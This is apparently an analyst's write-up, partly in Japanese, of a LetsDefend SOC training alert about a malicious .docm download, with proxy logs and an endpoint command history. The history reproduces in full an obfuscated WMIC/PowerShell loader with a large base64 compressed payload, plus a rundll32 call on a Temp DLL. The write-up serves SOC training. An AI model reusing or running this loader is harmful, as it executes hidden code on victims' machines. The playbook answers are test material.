LetsDefend level 1 alert SOC137 - Malicious File/Script Download Attempt event-id 76
- Details
- playbook
- End
Details
EventID: 76
Event Time: March 14, 2021, 7:15 p.m.
Rule: SOC137 - Malicious File/Script Download Attempt
Level: Security Analyst
Source Address 172.16.17.37
Source Hostname NicolasPRD
File Name INVOICE PACKAGE LINK TO DOWNLOAD.docm
File Hash f2d0c66b801244c059f636d08a474079
File Size 16.66 Kb
Device Action Blocked
Download (Password:infected): f2d0c66b801244c059f636d08a474079.zip
playbook
Define Threat Indicator
不審なダウンロードとして検出されたので、
Answer: Unknown or unexpected outgoing internet traffic
Check if the malware is quarantined/cleaned
Log Search
368 Mar, 07, 2021, 01:50 PM Proxy 172.16.17.37 48463 49.51.12.195 443
Request URL: iluuryeqa.info Request Method: GET Device Action: Allowed Process: powershell.exe Parent Process: wmiprvse.exe
iluuryeqa[.]info
VirusTotal: https://www.virustotal.com/gui/domain/iluuryeqa.info
urlscan: https://urlscan.io/result/052b6119-5114-4d67-ac38-72f1fe46abd9/
49.51.12.195
ViruaTotal: https://www.virustotal.com/gui/ip-address/49.51.12.195
urlscan: https://urlscan.io/ip/49.51.12.195
369 Mar, 07, 2021, 01:54 PM Proxy 172.16.17.37 48463 31.214.157.60 80
Request URL: http://ueba6ka.club/images/DVeUkINudhi79z0c_2Bv/hcMjSPUhHNICgDZ2eJc/uPkHWXvBmVjikkuyor3cnx/gi3BCr71LrlRP/OOmOS8_2/Bl7A_2Fjz2BM4Pth4RZbBKn/1OVxs19bE9/6wtE2QLgVO1DP1TCF/SoIEOJUXIYbo/RtuJbNDFWW5/V.avi Request Method: GET Device Action: Allowed Process: iexplore.exe Parent Process: svchost.exe
ueba6ka[.]club
VirusTotal: https://www.virustotal.com/gui/domain/ueba6ka.club/detection
サーバは現在登録されていない?
http[:]//ueba6ka[.]club/images/DVeUkINu...
VirusTotal: https://www.virustotal.com/gui/url/c55325d73f45e6669902fc59af3a60dbaea234a47e12f9a582f7673d018a59e6/detection
370 Mar, 07, 2021, 01:54 PM Proxy 172.16.17.37 48463 49.51.12.195 80
Request URL: http://ueba6ka.club/favicon.ico Request Method: GET Device Action: Allowed Process: iexplore.exe Parent Process: svchost.exe
CMD History - EndpointManagement
06.02.2021 12:42: whoami
18.02.2021 09:13: ipconfig
18.02.2021 09:14: dir
19.02.2021 09:15: hostname
19.02.2021 09:16: net user
19.02.2021 09:17: whoami
19.02.2021 11:18: tasklist
07.03.2021 16:12: wMic 'PRocesS' CAll 'cReate' 'PoweRSHElL -eXECuTIonpOli BYpAsS -nop -WIND hidDEN -noniNTeRaCtI iEX ('//'.('ls');'${rW}=[sYstEm.IO.COMPReSSIOn.coMPressIonmoDE]::DEcoMprESS;.('s'+'al') VV iEX;&('ps');&('s'+'al') VVv NEw-objECt;(&('V'+'Vv') systEm.IO.coMpreSsIon.DeFLAteSTReam( [iO.meMOrystREaM][ConVeRT]::FRomBaSE64StRing( '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tSRDUrd53TLRkOOd0F8dkaTy6nrbUKZOfBaXGQPwgiRSy5atiQzj3htlPXZjBcG87B9Y+vLY47Fr55A+5Jy069BAFX2076I8hnb5sktazTYfe7x5gsnctaxXOU+yk7oGrWWI8s7DA//ogm2GkHGTsTDy04Wly+8Q9TgYHO4mjjhwSsvjJfHSAt5FyTs8B8GLGdyiExFIDJAggyzJjuizaW0P35BD8UN5eCwDH5abdro8Xg3pPvCKxExxjEXwxvPyxijBiVxqL9obcdpoo2fE8aDKPIohTePMp5zjNsPzsgA4oNj4lZnbDow9VXPm6QEbLSy18bJ3jAxG0PqtNE4A0mdL//Qw//PSog6jHhfDtMfhNOgfMPJ9K876KxljaaByjIr8W9HiMy8sCsz6tmaHQrLp//61xBf3rX0HAO7vsHEb1//qQ//VxUG2Tzxuj37fbyFmq//aF4wcFGNuh5Dqd4m8qHb7z//1i9JPE4+WgtbhpyzB2GLJl53sx9d7aE1CWNswraS2tO+zm0lIonEi2x+R5AE8VLi3bvVDaWP9pgLTZX7LhdxH+HwYp3mLVwiAOq8ugbw23//n83rIGazQDsKPYuDcLY7MUWifGWq381b7isPuA8LN+PLLihac2o+jUfu6Pm2EPt46XOKdEr+XtQVTU8dCIwsCmg51fKJ5//KbeF1//////J8////PO7T18s97G+z9d+bV98fPnxv19fH58+//viXb378//m//ffven3//72l2+WH7//L45O+//dWfv//7lm59//+emf2+8//ffnlx+s3uv6r//Wdd//Y//92z99eXP799////Hw==' )'//'+[StRiNg][CHAR]44 +'//' '${RW})|.('%'){.('V'+'Vv') SYSTeM.IO.strEAmreaDER( '${_} '//'+[StRiNg][CHAR]44 +'//'[tEXT.EnCOdinG]::AsCIi )} ).rEADTOeNd( )|.('VV')'//')'
07.03.2021 16:13: PoweRSHElL -eXECuTIonpOli BYpAsS -nop -WIND hidDEN -noniNTeRaCtI iEX ('//'.('ls');'${rW}=[sYstEm.IO.COMPReSSIOn.coMPressIonmoDE]::DEcoMprESS;.('s'+'al') VV iEX;&('ps');&('s'+'al') VVv NEw-objECt;(&('V'+'Vv') systEm.IO.coMpreSsIon.DeFLAteSTReam( [iO.meMOrystREaM][ConVeRT]::FRomBaSE64StRing( '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tSRDUrd53TLRkOOd0F8dkaTy6nrbUKZOfBaXGQPwgiRSy5atiQzj3htlPXZjBcG87B9Y+vLY47Fr55A+5Jy069BAFX2076I8hnb5sktazTYfe7x5gsnctaxXOU+yk7oGrWWI8s7DA//ogm2GkHGTsTDy04Wly+8Q9TgYHO4mjjhwSsvjJfHSAt5FyTs8B8GLGdyiExFIDJAggyzJjuizaW0P35BD8UN5eCwDH5abdro8Xg3pPvCKxExxjEXwxvPyxijBiVxqL9obcdpoo2fE8aDKPIohTePMp5zjNsPzsgA4oNj4lZnbDow9VXPm6QEbLSy18bJ3jAxG0PqtNE4A0mdL//Qw//PSog6jHhfDtMfhNOgfMPJ9K876KxljaaByjIr8W9HiMy8sCsz6tmaHQrLp//61xBf3rX0HAO7vsHEb1//qQ//VxUG2Tzxuj37fbyFmq//aF4wcFGNuh5Dqd4m8qHb7z//1i9JPE4+WgtbhpyzB2GLJl53sx9d7aE1CWNswraS2tO+zm0lIonEi2x+R5AE8VLi3bvVDaWP9pgLTZX7LhdxH+HwYp3mLVwiAOq8ugbw23//n83rIGazQDsKPYuDcLY7MUWifGWq381b7isPuA8LN+PLLihac2o+jUfu6Pm2EPt46XOKdEr+XtQVTU8dCIwsCmg51fKJ5//KbeF1//////J8////PO7T18s97G+z9d+bV98fPnxv19fH58+//viXb378//m//ffven3//72l2+WH7//L45O+//dWfv//7lm59//+emf2+8//ffnlx+s3uv6r//Wdd//Y//92z99eXP799////Hw==' )'//'+[StRiNg][CHAR]44 +'//' '${RW})|.('%'){.('V'+'Vv') SYSTeM.IO.strEAmreaDER( '${_} '//'+[StRiNg][CHAR]44 +'//'[tEXT.EnCOdinG]::AsCIi )} ).rEADTOeNd( )|.('VV')'//')
07.03.2021 16:14: C://Windows//system32//rundll32.exe //s C://Users//Nicolas//AppData//Local//Temp//oo2ofzo5.dll DllRegisterServer
07.03.2021 16:16: cd Nicolas
07.03.2021 16:18: type notes.txt
とても気になるbase64があるが、コマンド実行の確認が取れていない。単純にデコードしてもこれが何かは分からなかった。
今回のalertに関してという意味では、
Answer: Quarantined
色々怪しさは満載だが。
Analyze Malware
では、今回のalertの原因となった「INVOICE PACKAGE LINK TO DOWNLOAD.docm」とは何なのか。
